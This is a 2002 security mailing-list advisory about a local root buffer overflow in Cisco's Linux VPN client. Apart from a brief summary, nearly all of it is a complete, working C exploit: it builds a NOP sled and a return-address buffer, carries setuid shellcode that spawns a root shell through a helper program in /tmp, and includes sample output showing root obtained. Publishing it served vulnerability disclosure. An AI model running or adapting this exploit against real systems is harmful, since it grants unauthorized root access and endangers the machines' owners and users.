[EXPL] Cisco VPNclient Buffer Overflow

From: support@securiteam.com
Date: 06/21/02 

From: support@securiteam.com
To: list@securiteam.com
Date: Fri, 21 Jun 2002 21:32:40 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Cisco VPNclient Buffer Overflow
------------------------------------------------------------------------

SUMMARY

Cisco VPN's client allows a user to connect to a Cisco VPN device using
the Linux operating system. A vulnerability in the product allows any
local user to gain root privileges via an exploitable buffer overflow in
the 'connect' argument. The overflow occurs whenever a long profile name
(520 bytes) is specified.

DETAILS

Exploit:
/* buffer overflow for cisco's vpnclient for Linux
   tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz

   to get this to properly work, you need to put the following code into
   xx.c, compile it (as xx), and place the executable into /tmp (to bypass
   tight PAM restrictions)

   #include <stdio.h>
   main() {
     setuid(0);
     execl("/bin/sh", "sh", NULL);
   }

   then compile this and run it. syntax is ./vpnclient <offset>
   tested under gentoo linux and debian:
   $ ls -la `which vpnclient`
   -rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
   $ ./vpnKILLient
   addr: 0xbffffbac, offset: 0
   Cisco Systems VPN Client Version 3.5.1 (Rel)
   Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
   Client Type(s): Linux
   Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686

   sh-2.05a# id
   uid=0(root) gid=100(users) groups=100(users),10(wheel)

   greetz: all of the angrypacket crew (of course)
           shok -> pheerable^2;
           vegac -> 31336++;

   when you get a chance, check out http://sec.angrypacket.com
*/

#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90
#define LEN 620 /* 520 to own eip */

/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\x31\xc0\x50\x68\x2f\x2f\x78\x78"
        "\x68\x2f\x74\x6d\x70\x89\xe3\x31"
        "\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
        "\x0b\xcd\x80\x00";

unsigned long get_sp (void) {
  __asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {

  int i, offset=0;
  long addr;
  char *buf, *ptr;

  if(argc > 1) offset = atoi(argv[1]);

  buf = (char *)malloc(sizeof(char) * LEN);
  bzero(buf, LEN);
  addr = get_sp() - offset;
  printf("addr: 0x%x, offset: %d\n", addr, offset);

  for(i = 0; i < LEN; i += 4) {
    *(long *)&buf[i] = addr;
  }

  for(i = 0; i < (LEN / 2); i++) {
    *(buf + i) = NOP;
  }

  ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
  for(i = 0; i < strlen(shell); i++) {
    *(ptr++) = shell[i];
  }
  buf[LEN - 1] = '\0';

  execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, 0);
  return(0);

}

ADDITIONAL INFORMATION

The information has been provided by
<mailto:methodic@bigunz.angrypacket.com> methodic.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages